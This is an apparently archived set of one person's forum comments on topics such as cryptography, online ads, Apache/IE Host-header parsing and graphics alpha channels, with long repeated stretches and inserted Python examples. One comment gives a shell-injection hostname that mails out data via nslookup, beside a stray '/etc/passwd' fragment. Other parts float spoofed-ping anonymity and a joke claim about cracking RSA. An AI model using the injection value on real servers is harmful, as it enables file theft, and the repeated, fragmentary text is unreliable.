Have we reached the stage where we need to evolve ourselves? Where we are in control of evolution?
I was thinking of this last night and I came to the conclusion that we already control our evolution. Fetuses are routinely tested for a host of problems before they are born. Many parents will choose to not have the child if it doesn't look like it will fare well. If that isn't selection, what is?
Also, in China and countries where the government only allows parents to have one child, parents regularly pre-select male children. I really have no clue why this is, but I suspect it is because: a) the family name is carried down through the male; b) the male child has a better chance at a higher paying job the way the world is structured today. While this may not seem like evolution, I think it is. If there are 70% males and 30% females then natural selection in the male population is going to occur more rapidly.
I suppose this news is responsible for RedHat's 20% stock price increase today. For those of you who missed out on the IPO last year, now is still a good time to buy. I picked up a bunch in the teens last month and have been watching with glee as it has almost doubled.
The thing about RedHat that Wall Street doesn't understand is they aren't going to go away. It's a safe company as far as I'm concerned. Their stock may be wild and crazy right now but it's a good long term investment. I think that their 300/share price earlier this year was just silly but it shows where they could be in a few years.
Damn it Jim, I'm just an engineer not a financial advisor!
IIR, there have been court cases where cryptographically signed business documents have been treated as "hand signed." This occurred many years ago, I believe around 1995. I have also recalled recent cases where online shrink-wrap licenses have been upheld for a very limited domain - mainly IP protection.
In my mind, online shrink-wrap licenses carry very little weight and I have no problem clicking "Yes, I agree" without reading an agreement. It's simply too easy to argue that another user posed as you. Web crawlers can easily SUBMIT whatever is expected and a computer program cannot legally enter into such an agreement.
It's kind of scary to think that online sites may move to legally binding cryptographic signatures. Imagine a feature built into the tag that allows a user to digitally sign the POST data... Then you may end up having to read more legal agreements than actual online content. Slashdot may require you to use this feature or you automatically become "Anonymous coward." etc, etc. The possibilities are endless and many are not very encouraging.
Most client-server games do some calculations on the client side to:
a. reduce server load - this solution scales better.
b. reduce latency and bandwidth
While I know nothing about the internals of D2 I would be very surprised if everything was calculated on the server - or I would expect the game to be laggy to play on a modem.
Even if this is the case, it's still possible to cheat through other means:
a. display game information the client is not supposed to know - but is sent over the network anyway. For example if a player shouldn't see behind a wall this calculation is usually done on the client side.
b. bots can perform repetitive tasks that make a little money and make the player rich.
c. borgs, à la Quake
Personally, I'd like to see an online game that *only* bots can play. Then programmers can write all sorts of AIs to play against other AIs... and the world is persistent - so the programmers have to concentrate on how to program in a dynamic environment. If your program dies - your character dies. :)
Worse yet - because many news sites break up their stories into two or three "pages", the Doublecross.coms of the world don't just know *what* you read, but how *fast* you read it, and whether you read just the first page and throw it away as "uninteresting" or the followup pages of the article.
What is wrong with this? If no one is interested in a topic then they shouldn't waste time writing about it. One way to gauge interest is by breaking up the article and seeing how far people get. I see nothing wrong with this - it's a non-invasive way to get feedback. Articles shouldn't be written in a vacuum, and I don't think we need to have Nelson telling us everything.
You are getting content for free so why worry about it? I personally think banner ads are useless once you turn off animated gifs. Advertising networks also shoot themselves in the foot with all this tracking "technology." Occasionally I'll see an ad I have half a mind to click on - but when I see the URL points to some tracking cgi I say forget it. I want to know where I'm going to be sent before I click on something - and doubleclick is not a place I want to visit!
Is DSL really worth the extra price on the house? I mean if you have to pay 10k-20k extra on the house you could spend that on a leased line or wireless DSL (like I have) - and then live anywhere you want. Besides, DSL will probably be a thing of the past long before you sell your house.
I was interested in the tax benefits of offshore companies and IIR it's perfectly legal to create an offshore shell corporation (as long as you report all earnings to the IRS). Many countries do not require you disclose the owners of the country nor do they make them public (which is a big attraction for many people).
Some of these countries don't even require your name to set up the company - just a legal contact who can be a local lawyer. These shell companies can then get ISP space in that country and serve web pages. The local lawyer will also (for a fee of course) forward all of your snail mail back to the US so you have an instant foreign headquarters.
A US company could sue you, a US resident, as an officer of the company but they have no way to determine who you are or what country you belong to. I read an article about sex.com, which was stolen from someone else. The domain is worth hundreds of millions so naturally they are trying to get it back - but sex.com was sold to an offshore company which is believed to be owned by the same guy - but no one except the IRS can prove it. I don't know if there are any procedures for getting at IRS records - but I would suspect they are very hard to obtain.
Of course this is all from my very limited knowledge... My research was targeted at legal activity and what you are proposing is semi-legal to illegal. Some of these countries have laws that allow them to dissolve companies and seize bank accounts from known drug traffickers and other illegal types.
This software is bug-free. It is perfect, as perfect as human beings have achieved. Consider these stats: the last three versions of the program -- each 420,000 lines long -- had just one error each. The last 11 versions of this software had a total of 17 errors. Commercial programs of equivalent complexity would have 5,000 errors.
How can they be sure it's bug free? If the last 14 versions had 20 errors, did they think it was bug free each time - only to find more bugs? At 500k lines of code you can't prove it all mathematically and human checkers are... well, human.
One way to measure how many bugs your code has is to purposefully introduce a bug and tell people to find it. Then you count how many new bugs they found along with the bug you introduced and scale that by the lines of code you have. But this technique won't work if you only have 1 or 2 bugs that people are actively looking for in the first place. So, my question is - how can they be sure it is bug free?
I used to think that way about virus/worm and hacker/cracker. But... English terms change meaning whether you like it or not. This FAQ was written over 5 years ago. Since then the scope of people using these terms changed significantly. The public can't remember hundreds of jargon words so hacker and cracker become one "cracker" - and virus and worm become "virus". "Virus software" has to protect against what we knew as worms as well as viruses. You don't market "Norton anti-worm/virus" software or people are going to think it's a medicinal product. 99% of people have never heard the term worm, yet most know that a virus is something bad you can get. To make matters worse, the distinction on how it propagates is only understandable by technical people. There is no logical reason for most people to call one thing a virus and another thing a worm.
I think this is partially a case of technical people feeling they are elite and need to correct people who could care less, much like an English teacher who corrects your speech that no one else sees a problem with. You have to speak the language of the people when you report in the media. It's not that the reporters don't know what a worm is (though I'm sure many don't), it's that you (and your other 1%) are not their target audience.
The MS patch revolves around defining various types of security levels for attachments. At present, they only define two levels. At level 1 (.exe, .com, .vbs, et cetera), the attachment is deleted. Poof. Gone.
They aren't gone or deleted. It will not allow the user to run or save them. If you later change your security policy you can save/run them any time you like. The data is always there.
I think this makes good sense as a default policy for 99% of users. If you can't figure out how to change your policy, you shouldn't be running attachments in the first place.
That was the whole problem in this case. You got email from people you trusted and so you opened it. PGP would have only added to your false sense of security!
(WOTB) way off topic, but... Actually most search engines cache web pages. That's how they are able to show context when you search for something. They just don't make it available to the users in its entirety. In my opinion Google does violate copyright law. The thing is they remove the cache for anyone who complains, so so far they have avoided lawsuits. I think it will take a court case to decide the issue. The other search engines don't appear comfortable being the first to have such a court case.
The caching is only really needed for sites that are frequently down or unavailable. These sites probably don't have the money to sue. Also, since Google only updates pages every month or two it's not likely to take away from ad hits of big sites.
er.. the /jc/ was a typo on my part - it shouldn't be there.
As the other poster commented, this isn't really a problem with Apache, it's IE's fault. IE thinks the hostname from the URL includes the %2f %3f characters - and it's passing this to Apache in the request header. What I thought was interesting is the fact that Apache unescaped the string. This means that there might be security holes in CGI scripts that expect hostname strings to be safe.
For example if the unescaped hostname looks like this:
I noticed this exploit causes problems with Apache as well. This could possibly cause a security hole somewhere:
when I specify a URL like this:
http://www.somewhere.com/test.php3?q=8
Apache correctly reports:
"Host: www.somewhere.com"
but when I specify a URL like this:
http://www.somewhere.com%2ftest.php3%3fq=8
Apache reports:
"Host: www.somewhere.com/jc/test.php3?q=8"
This means Apache is confused on what host you are trying to reach and virtual hosting will resort to the default hostname. I confirmed this on my web server.
But... for some reason the cookie exploit doesn't work for me. I tried it on w2k and IE 5.
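The concern raised in these two comments, that a CGI script may treat the Host value as a safe hostname even though it can arrive containing an unescaped path and query, can be handled by validating the header before using it. The following is an added example, not part of the original posts and not Apache's code; `validate_host`, `self_url`, `ALLOWED_HOSTS` and `DEFAULT_HOST` are hypothetical names, and the sample values are constructed from the hostnames quoted above.

```python
import re

# Hypothetical allow-list of virtual hosts this script serves (assumption).
ALLOWED_HOSTS = {"www.somewhere.com"}
# Assumption: canonical name used whenever the client-supplied Host is rejected.
DEFAULT_HOST = "www.somewhere.com"

# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
# hostname, optional trailing dot, optional :port. Nothing else is accepted,
# so '/', '?', '%', whitespace and control characters all fail the match.
_HOST_RE = re.compile(
    r"(?P<name>" + _LABEL + r"(?:\." + _LABEL + r")*)\.?(?::(?P<port>[0-9]{1,5}))?"
)


def validate_host(raw):
    """Return (hostname, port) for a well-formed, allow-listed Host value, else None."""
    if raw is None or len(raw) > 255:
        return None
    # fullmatch: the whole header must be a hostname, not merely start with one.
    m = _HOST_RE.fullmatch(raw)
    if m is None:
        return None
    name = m.group("name").lower()
    port = int(m.group("port")) if m.group("port") else None
    if port is not None and not (0 < port < 65536):
        return None
    if name not in ALLOWED_HOSTS:
        return None
    return name, port


def self_url(environ, path="/"):
    """Build an absolute URL for this site without trusting the raw Host header.

    `environ` is the CGI environment; HTTP_HOST carries the request's Host header.
    """
    checked = validate_host(environ.get("HTTP_HOST"))
    name, port = checked if checked else (DEFAULT_HOST, None)
    netloc = name if port in (None, 80) else "%s:%d" % (name, port)
    return "http://%s%s" % (netloc, path)


# Constructed sample Host values: the normal case, the value a server would see
# after unescaping %2f and %3f, the value as quoted in the post, and a port.
SAMPLES = [
    "www.somewhere.com",
    "www.somewhere.com/test.php3?q=8",
    "www.somewhere.com/jc/test.php3?q=8",
    "www.somewhere.com:8080",
    "other.example",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(repr(value), "->", validate_host(value))
```

A script that builds redirects, links or cookie domains from `self_url` falls back to its own canonical name whenever the header is anything other than a plain allow-listed hostname.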
Since we have long moved away from the gold standard, I think the money paid is actually a virtual item. It only has value because the government says it does. Substitute government for online-game as you like.
From reading the story, it sounds like their problems stemmed from the fact they invested quickly in something they had no clue about. They did not take the time to consult with technical people, nor did they consult with customers who might have purchased the product.
1. Consulting with technical people would have told them two things:
a. one time pads are not possible without key management issues which makes their system the same as what is already out there (from what I gather from the article).
b. Even if they invented some sort of holy-grail of encryption AND somehow everyone agreed it was 100% secure, people wouldn't pay money for it when good solutions exist for free or very low cost. Call up the patent owners of IDEA, and ask them if they've made $100 million licensing their product.
2. So where is the money being made from encryption? RSA, and Verisign, Certicom. Why? Because of the browsers. If you've got the greatest thing in the world, it's not going to be integrated into the majority of browsers until many years from now. Until then, no one gives a damn. Web sites want seamless usage for everyone, not some fancy thing that is just going to confuse people.
Other uses of crypto: Selling VPN hardware, smart cards, etc. In my opinion the VPN market is already served well by existing algorithms. Chips for doing 3DES are cheap and trusted. The one place where a faster/easier to implement algorithm would be adopted is smart cards - where price per unit outweighs licensing cost. From my talking with smart card makers this is a very niche market still and there is more talk than money floating around.
Not too long ago some researchers at IBM discovered an encryption algorithm that had some properties you could prove. It was neat stuff, and it made a big splash in the press for a few days and we never heard of it again - because there is no market for new crypto algorithms.
But, hey... what do I know... I STILL think priceline.com is a bad idea.
As to your other point most encryptions are very easy to differentiate from true noise. For instance they possess headers, well delimited starts and stops of messages, etc.
Most ciphers don't have headers (can't think of any that do). The output of a cipher is indistinguishable from noise. The only reason for headers is to make it recognizable on purpose (such as in PGP).
Moreover there is no necessity that encryption is undetectable as such. While patterns in the output are *usually* indications of weakness in the crypto this is by no means a guarantee. I could modify DES by making its output 1128 bits with every other bit a 0 with no loss in its security. In fact it may be the case (I don't know, if anyone else has superior knowledge please tell me) that it is possible to distinguish the output of say DES and Blowfish without having any knowledge of the key or secret message.
You lost me there, but if you modify DES it wouldn't be DES anymore. Also, you can't tell what algorithm was used given a data stream and nothing else. Essentially, the person would have to attempt to brute force the stream using all known algorithms. The block size might be able to be detected if the stream has a lot of repeating data - but assuming the data was compressed first you will not be able to determine anything.
1. ECC is not patent free. Several companies are engaged in patent war over ECC (Certicom being the number one). The "nice" curves have already been patented (mathematicians in the audience will crucify me for describing some curves as "nice", but it's a reasonably accurate layman description--some curves make crypto easier than others, hence they're "nice").
There are a number of ECC patents, but it's possible to write a 'nice' implementation without violating any of them. It's not possible to write an implementation of RSA without violating their patent.
2. ECC is not faster than RSA. RSA is not faster than ECC. Nor are they equal in speed. While this all sounds terribly contradictory, it's all true; as we all know from having complained about NT-versus-Linux benchmarks, whoever is paying the analysis firm gets the results they want. When Certicom pays for ECC-versus-RSA, it always turns out that ECC is faster. When RSADSI pays for it, it always turns out that RSA is faster.
Emacs beats vi!
You have to take into account the relative strength of ECC keys versus RSA keys. ECC keys can be much shorter and therefore require much less processing. It's debatable what that ratio should be, but contests like this help decide those numbers.
Even assuming that ECC were unambiguously faster than RSA, it wouldn't make a tinker's dam of difference. The applications which use asymmetric cryptography extensively are few and very far between. Symmetric ciphers have a better foundation in number theory, are more thoroughly cryptanalyzed and are often faster. Most of the time when asymmetric crypto is used, it's only used to negotiate a symmetric key. If it takes RSA a millisecond to encrypt/decrypt a 256-bit Twofish key, what do I care if it takes ECC a microsecond to do the same task?
One millisecond? Ok, I'm using weird hardware - but my decryption is way longer than 1 millisecond. (IIRC around 50-100ms for a 256 bit field). Considering all secure connections must decrypt at least one asymmetrical key, you are looking at least 50ms on connection time. That means you can only accept 20 connections per second per machine. For high usage applications this ain't so great. Speed does matter. Makes very little difference on a web browser - I'll give you that, but if you download a secure page with 20 inline images - each must do an RSA decrypt. Multiply by the number of users and you've got a CPU crisis on the server side - unless you start buying crypto-accelerator boards.
For those of you unfamiliar with elliptical encryption I recommend this book. EE is an asymmetrical algorithm in the same way RSA is. This "crack" is significant because it shows the relative strength between RSA and EE. 512 bit RSA can be cracked in about 12 microseconds. Other nice properties about EE algorithms:
- patent free (RSA expires this year!)
- faster than RSA
- can be implemented easily using 8/16bit microcode (ideal for smartcards)
Bruce likes to claim cracking contests have no value, but I disagree. EEs haven't been studied as much as RSA, so contests like this are important to showing the algorithm's strength as implemented in the real world - and more importantly - generating interest in the research community.
full BGP4 routing so all those pipes are used at all times, not just when one fails.
Here is an article describing what BGP4 (Border Gateway Protocol) is and why you need it.
From the site:
Meteorites are more rare than any other material on earth.
I'm just being picky here, but I would guess almost all of the radioactive materials are less available than meteorites. After all they have half-lives. But who wants a radioactive knife?
Imagine trying to defend yourself:
Stand back.... or I'll give you cancer... and you will die in five years if you don't get proper treatment!!!!
...Force people to give all their money to corporations, and eliminate all this huhu about marketing and products.
Get rid of the middle men that are advertising and the actual product. Things would be much more efficient that way...
Oh wait! That would be Human Slavery Controlled by Corporations!
And I thought you were going to say... Oh wait! That would be called the government.
I wrote a discussion on how one might do anonymous/untraceable publishing on the internet:
http://jonathanclark.com/diary/anonpub/
I wasn't aware of freedom net at the time, but they use many of the same ideas. They do not do publishing (i.e. only outgoing connections) mainly for fear of legal problems.
Another method I've seen tossed around is to use redirecting proxy servers where URLs look like this:
http://site1.com/XXX
where XXX decrypts to -> http://site2.com/YYY and
YYY decrypts to http://site3.com/actual_content.html
The only trouble is getting people to run the proxy servers.
One other idea I have played around with is to use spoofed ping packets to transfer content semi-anonymously. It works by the connecting party somehow requesting the content and then posting their IP address. Then you, the server, send it to some random machine on the internet inside of a ping packet with a spoofed return address to them. This can be used to make the chain of computers between you and them very long - also making it travel through countries where it is hard to get search warrants.
The main problem is making the initial request, but that could be done with a Gnutella-like network.
The other problem here is the receiving computer needs to somehow specify which packets weren't received (because ping is lossy).
food for thought...
More notes on alpha channels:
Without alpha channels you cannot composite an image onto a background without a "pixelized border". With an alpha channel the edges of one image can be smoothly faded into the background image. Alpha channels are especially useful in games. Things like smoke/fire are not solid objects; they are transparent and they fade out near their extents. To achieve this gradual fade out the alpha channel goes from 255 (or 1.0) in the center of the image to 0 near the edges.
Also, "Alpha Buffers" are slightly different from "Alpha Channels". When drawing to a frame buffer with an Alpha Buffer the alpha values from the source image are usually copied along with the RGB components. In 3D games this is useful for drawing transparent shadows for objects. Without this, you can only draw solid black shadows or have a weird looking shadow.
- First the object is projected onto the ground.
- The screen area where the shadow is to be drawn is cleared in the alpha channel.
- The object is drawn with updates to the RGB channels turned off (i.e. only the alpha channel - also called a stencil buffer - is updated).
- A flat polygon is transparently drawn to the frame buffer where the alpha value is not 0.
The result is a transparent shadow that doesn't overlap itself and get darker where polygons intersect.
On the PlayStation 2 and several new games truecolor is used. Since 24bit color is difficult to address (requires multiply by 3 or X*2+X) 32bit is usually used. This gives 8bits left over for the alpha/stencil buffer. All sorts of neat tricks can be done with an alpha buffer. I've used it on the PS2 to do depth of field (i.e. distant objects look blurry) rendering without having to draw my scene more than once.
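The four-step shadow pass listed in this comment, run next to the naive approach of blending each projected polygon separately, as an added Python example that is not part of the original comment. The framebuffer size, ground brightness, shadow opacity and rectangle coordinates are constructed values, and the projected polygons are simplified to rectangles.

```python
# Added illustration; all sizes, colours and coordinates are constructed.
WIDTH, HEIGHT = 8, 4
GROUND = 200         # ground brightness, 0-255 (single channel for brevity)
SHADOW_ALPHA = 0.5   # how strongly the shadow polygon darkens the ground

# The object's polygons after projection onto the ground (step 1), simplified
# to half-open rectangles (x0, y0, x1, y1). They overlap in columns 3 and 4.
PROJECTED = [(1, 1, 5, 3), (3, 1, 7, 3)]


def new_framebuffer():
    """Return (color, alpha) planes: ground-coloured pixels, alpha all zero."""
    color = [[GROUND] * WIDTH for _ in range(HEIGHT)]
    alpha = [[0] * WIDTH for _ in range(HEIGHT)]
    return color, alpha


def blend_black(value):
    """Blend a black pixel over `value` at SHADOW_ALPHA."""
    return round(value * (1.0 - SHADOW_ALPHA))


def pixels(rect):
    """All (x, y) positions covered by a half-open rectangle."""
    x0, y0, x1, y1 = rect
    return [(x, y) for y in range(y0, y1) for x in range(x0, x1)]


def bounding_box(rects):
    """Smallest rectangle covering every rectangle in `rects`."""
    return (min(r[0] for r in rects), min(r[1] for r in rects),
            max(r[2] for r in rects), max(r[3] for r in rects))


def naive_shadow():
    """Blend every projected polygon on its own: overlaps get darkened twice."""
    color, _ = new_framebuffer()
    for rect in PROJECTED:
        for x, y in pixels(rect):
            color[y][x] = blend_black(color[y][x])
    return color


def stencil_shadow():
    """Mark coverage in the alpha plane first, then darken each pixel once."""
    color, alpha = new_framebuffer()
    area = bounding_box(PROJECTED)
    # Step 2: clear the alpha plane over the area the shadow can touch.
    for x, y in pixels(area):
        alpha[y][x] = 0
    # Step 3: draw the object with colour writes off; only alpha is updated.
    for rect in PROJECTED:
        for x, y in pixels(rect):
            alpha[y][x] = 255
    # Step 4: draw one flat transparent polygon, only where alpha is not 0.
    for x, y in pixels(area):
        if alpha[y][x] != 0:
            color[y][x] = blend_black(color[y][x])
    return color


if __name__ == "__main__":
    print("naive  :", naive_shadow()[1])
    print("stencil:", stencil_shadow()[1])
```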
This software is bug-free. It is perfect, as perfect as human beings have achieved. Consider these stats: the last three versions of the program -- each 420,000 lines long -- had just one error each. The last 11 versions of this software had a total of 17 errors. Commercial programs of equivalent complexity would have 5,000 errors.
How can they be sure it's bug free? If the last 14 versions had 20 errors, did they think it was bug free each time - only to find more bugs? At 500k lines of code you can't prove it all mathematically and human checkers are... well, human.
One way to measure how many bugs your code has is to purposefully introduce a bug and tell people to find it. Then you count how many new bugs they found along with the bug you introduced and scale that by the lines of code you have. But this technique won't work if you only have 1 or 2 bugs that people are actively looking for in the first place. So, my question is - how can they be sure it is bug free?
I used to think that way about virus/worm and hacker/cracker. But... English terms change meaning whether you like it or not. This FAQ was written over 5 years ago. Since then the scope of people using these terms changed significantly. The public can't remember hundreds of jargon words so hacker and cracker become one "cracker" - and virus and worm become "virus". "Virus software" has to protect against what we knew as worms as well as viruses. You don't market "Norton anti-worm/virus" software or people are going to think it's a medicinal product. 99% of people have never heard the term worm, yet most know that a virus is something bad you can get. To make matters worse, the distinction on how it propagates is only understandable by technical people. There is no logical reason for most people to call one thing a virus and another thing a worm.
I think this is partially a case of technical people feeling they are elite and need to correct people who could care less, much like an English teacher who corrects your speech that no one else sees a problem with. You have to speak the language of the people when you report in the media. It's not that the reporters don't know what a worm is (though I'm sure many don't), it's that you (and your other 1%) are not their target audience.
The MS patch revolves around defining various types of security levels for attachments. At present, they only define two levels. At level 1 (.exe, .com, .vbs, et cetera), the attachment is deleted. Poof. Gone.
They aren't gone or deleted. It will not allow the user to run or save them. If you later change your security policy you can save/run them any time you like. The data is always there.
I think this makes good sense as a default policy for 99% of users. If you can't figure out how to change your policy, you shouldn't be running attachments in the first place.
That was the whole problem in this case. You got email from people you trusted and so you opened it. PGP would have only added to your false sense of security!
(WOTB) way off topic, but...
Actually most search engines cache web pages. That's how they are able to show context when you search for something. They just don't make it available to the users in its entirety. In my opinion Google does violate copyright law. The thing is they remove the cache for anyone who complains, so so far they have avoided lawsuits. I think it will take a court case to decide the issue. The other search engines don't appear comfortable being the first to have such a court case.
The caching is only really needed for sites that are frequently down or unavailable. These sites probably don't have the money to sue. Also, since google only updates pages every month or two it's not likely to take away from ad hits of big sites.
er.. the /jc/ was a typo on my part - it shouldn't be there.
/etc/passwd`
As the other poster commented, this isn't really a problem with Apache, it's IE's fault. IE thinks the hostname from the URL includes the %2f %3f characters - and it's passing this to Apache in the request header. What I thought was interesting is the fact that Apache unescaped the string. This means that there might be security holes in CGI scripts that expect hostname strings to be safe.
For example if the unescaped hostname looks like this:
somewhere.com;`mail s@s.com
and some CGI script does something like this:
nslookup $HOSTNAME
you've got a big problem!
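One way a CGI script can guard against the unescaped Host value described in the post above, shown as an added example (not code from the original post or from Apache). The function names are hypothetical, the sample strings are the ones quoted in the posts, and IPv6 literals are assumed out of scope.

```python
import re
import subprocess
from urllib.parse import unquote

# One DNS label per RFC 1123: letters, digits, inner hyphens, 1-63 chars.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def validated_hostname(raw_host):
    """Return a lowercase hostname taken from a Host header, or raise ValueError."""
    # Decode first, as the server in the post did, so %2f or %3f cannot
    # smuggle separators past the check. IPv6 literals are out of scope.
    host = unquote(raw_host).strip()
    name, sep, port = host.partition(":")
    if sep and not (port.isascii() and port.isdigit() and 0 < int(port) < 65536):
        raise ValueError("bad port in Host header")
    name = name.rstrip(".")
    if not name or len(name) > 253:
        raise ValueError("bad hostname length")
    for label in name.split("."):
        if not _LABEL.fullmatch(label):
            raise ValueError("illegal hostname label: %r" % label)
    return name.lower()


def nslookup_argv(raw_host):
    """Argument vector for nslookup; the hostname is one argv entry."""
    return ["nslookup", validated_hostname(raw_host)]


def lookup(raw_host):
    """Run nslookup without a shell, so ; ` $ | are never interpreted."""
    done = subprocess.run(nslookup_argv(raw_host), capture_output=True,
                          text=True, timeout=10, check=False)
    return done.stdout


if __name__ == "__main__":
    # Constructed samples: the three Host values quoted in the posts.
    for sample in ("www.somewhere.com",
                   "www.somewhere.com%2ftest.php3%3fq=8",
                   "somewhere.com;`mail s@s.com"):
        try:
            print(repr(sample), "->", nslookup_argv(sample))
        except ValueError as err:
            print(repr(sample), "rejected:", err)
```

Validation and shell-free execution are independent layers: either one alone stops the hostname string from being parsed as a command, and the allow-list also keeps malformed names out of logs and virtual-host lookups.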
I noticed this exploit causes problems with Apache as well. This could possibly cause a security hole somewhere:
when I specify a URL like this:
http://www.somewhere.com/test.php3?q=8
Apache correctly reports:
"Host: www.somewhere.com"
but when I specify a URL like this:
http://www.somewhere.com%2ftest.php3%3fq=8
Apache reports:
"Host: www.somewhere.com/jc/test.php3?q=8"
This means Apache is confused on what host you are trying to reach and virtual hosting will resort to the default hostname. I confirmed this on my web server.
But... for some reason the cookie exploit doesn't work for me. I tried it on w2k and IE 5.
money paid for EverQuest cloak == real-world item
Since we have long moved away from the gold standard, I think the money paid is actually a virtual item. It only has value because the government says it does. Substitute government for online-game as you like.
From reading the story, it sounds like their problems stemmed from the fact they invested quickly in something they had no clue about. They did not take the time to consult with technical people, nor did they consult with customers who might have purchased the product.
1. Consulting with technical people would have told them two things:
a. one time pads are not possible without key management issues which makes their system the same as what is already out there (from what I gather from the article).
b. Even if they invented some sort of holy-grail of encryption AND somehow everyone agreed it was 100% secure, people wouldn't pay money for it when good solutions exist for free or very low cost. Call up the patent owners of IDEA, and ask them if they've made $100 million licensing their product.
2. So where is the money being made from encryption? RSA, and Verisign, Certicom. Why? Because of the browsers. If you've got the greatest thing in the world, it's not going to be integrated into the majority of browsers until many years from now. Until then, no one gives a damn. Web sites want seamless usage for everyone, not some fancy thing that is just going to confuse people.
Other uses of crypto: Selling VPN hardware, smart cards, etc. In my opinion the VPN market is already served well by existing algorithms. Chips for doing 3DES are cheap and trusted. The one place where a faster/easier to implement algorithm would be adopted is smart cards - where price per unit outweighs licensing cost. From my talking with smart card makers this is a very niche market still and there is more talk than money floating around.
Not too long ago some researchers at IBM discovered an encryption algorithm that had some properties you could prove. It was neat stuff, and it made a big splash in the press for a few days and we never heard of it again - because there is no market for new crypto algorithms.
But, hey... what do I know... I STILL think priceline.com is a bad idea.
As to your other point most encryptions are very easy to differentiate from true noise. For instance they possess headers, well delimited start and stops of messages, etc.
Most ciphers don't have headers (can't think of any that do). The output of a cipher is indistinguishable from noise. The only reason for headers is to make it recognizable on purpose (such as in PGP).
Moreover there is no necessity that encryption is undetectable as such. While patterns in the output are *usually* indications of weakness in the crypto this is by no means a guarantee. I could modify DES by making its output 1128 bits with every other bit a 0 with no loss in its security. In fact it may be the case (I don't know; if anyone else has superior knowledge please tell me) that it is possible to distinguish the output of say DES and Blowfish without having any knowledge of the key or secret message.
You lost me there, but if you modify DES it wouldn't be DES anymore. Also, you can't tell what algorithm was used given a data stream and nothing else. Essentially, the person would have to attempt to brute force the stream using all known algorithms. The block size might be able to be detected if the stream has a lot of repeating data - but assuming the data was compressed first you will not be able to determine anything.
1. ECC is not patent free. Several companies are engaged in patent war over ECC (Certicom being the number one). The "nice" curves have already been patented (mathematicians in the audience will crucify me for describing some curves as "nice", but it's a reasonably accurate layman description--some curves make crypto easier than others, hence they're "nice").
There are a number of ECC patents, but it's possible to write a 'nice' implementation without violating any of them. It's not possible to write an implementation of RSA without violating their patent.
2. ECC is not faster than RSA. RSA is not faster than ECC. Nor are they equal in speed. While this all sounds terribly contradictory, it's all true; as we all know from having complained about NT-versus-Linux benchmarks, whoever is paying the analysis firm gets the results they want. When Certicom pays for ECC-versus-RSA, it always turns out that ECC is faster. When RSADSI pays for it, it always turns out that RSA is faster.
Emacs beats vi!
You have to take into account the relative strength of ECC keys versus RSA keys. ECC keys can be much shorter and therefore require much less processing. It's debatable what that ratio should be, but contests like this help decide those numbers.
Even assuming that ECC were unambiguously faster than RSA, it wouldn't make a tinker's dam of difference. The applications which use asymmetric cryptography extensively are few and very far between. Symmetric ciphers have a better foundation in number theory, are more thoroughly cryptanalyzed and are often faster. Most of the time when asymmetric crypto is used, it's only used to negotiate a symmetric key. If it takes RSA a millisecond to encrypt/decrypt a 256-bit Twofish key, what do I care if it takes ECC a microsecond to do the same task?
One millisecond? Ok, I'm using weird hardware - but my decryption is way longer than 1 millisecond. (IIRC around 50-100ms for a 256 bit field). Considering all secure connections must decrypt at least one asymmetrical key, you are looking at at least 50ms on connection time. That means you can only accept 20 connections per second per machine. For high usage applications this ain't so great. Speed does matter. Makes very little difference on a web browser - I'll give you that, but if you download a secure page with 20 inline images - each must do an RSA decrypt. Multiply by the number of users and you've got a CPU crisis on the server side - unless you start buying crypto-accelerator boards.
Ok, I got confused mail. RSA can't really be broken in 12 microseconds. That was a joke - referring to a previous article posted on /.
512 RSA really takes a few days to factor with specialized hardware (AFAIK).
For those of you unfamiliar with elliptical encryption I recommend this book. EE is an asymmetrical algorithm in the same way RSA is. This "crack" is significant because it shows the relative strength between RSA and EE. 512 bit RSA can be cracked in about 12 microseconds. Other nice properties about EE algorithms:
- patent free (RSA expires this year!)
- faster than RSA
- can be implemented easily using 8/16bit microcode (ideal for smartcards)
Bruce likes to claim cracking contests have no value, but I disagree. EEs haven't been studied as much as RSA, so contests like this are important to showing the algorithm's strength as implemented in the real world - and more importantly - generating interest in the research community.